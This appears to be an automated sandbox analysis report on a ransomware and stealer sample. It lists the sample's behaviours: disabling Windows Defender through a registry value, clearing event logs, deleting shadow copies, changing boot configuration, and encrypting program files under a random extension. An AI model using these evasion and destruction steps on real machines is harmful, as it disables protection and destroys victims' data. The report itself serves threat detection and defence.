Malware Analysis Report

2024-10-16 03:11

Sample ID: 220113-l1xdaahca9
Target: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
SHA256: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
Tags: evasion, ransomware, spyware, stealer, trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d

Threat Level: Known bad

The file 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d was found to be: Known bad.

Malicious Activity Summary

Tags: evasion, ransomware, spyware, stealer, trojan

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Modifies security service

Clears Windows event logs

Deletes shadow copies

Modifies boot configuration data using bcdedit

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Interacts with shadow copies

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-01-13 10:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-01-13 10:00
Reported: 2022-01-13 10:06
Platform: win7-en-20211208
Max time kernel: 75s
Max time network: 3s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"

Signatures

Deletes Windows Defender Definitions

Tags: evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A

Modifies Windows Defender Real-time Protection settings

Tags: evasion, trojan

Modifies security service

Tags: evasion

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A

Clears Windows event logs

Tags: evasion, ransomware

Deletes shadow copies

Tags: ransomware

Modifies boot configuration data using bcdedit

Tags: ransomware, evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Reads user/profile data of web browsers

Tags: spyware, stealer

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200377.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Tehran.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Media Player\de-DE\WMPDMC.exe.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_over.gif.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBPAGE.DPV.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0291794.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\localizedSettings.css | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\localizedSettings.css | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01006_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSTH7ES.LEX.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\TipRes.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieNewsletter.dotx.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00272_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18238_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\POSTCD98.POC.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBHOME.POC.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199661.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-hot.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00559_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBCOLOR.SCM.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02073_.GIF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Qatar.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107130.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03795_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcor.dll.mui | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBOXES.XML.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyMergeLetter.dotx.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\localizedStrings.js | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0214948.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A
File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | N/A

Launches sc.exe

Interacts with shadow copies

Tags: ransomware

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1792 wrote to memory of 520 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 520 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 1792 wrote to memory of 520 | N/A | C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | C:\Windows\system32\net.exe
PID 520 wrote to memory of 540 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
PID 520 wrote to memory of 540 | N/A | C:\Windows\system32\net.exe | C:\Windows\system32\net1.exe
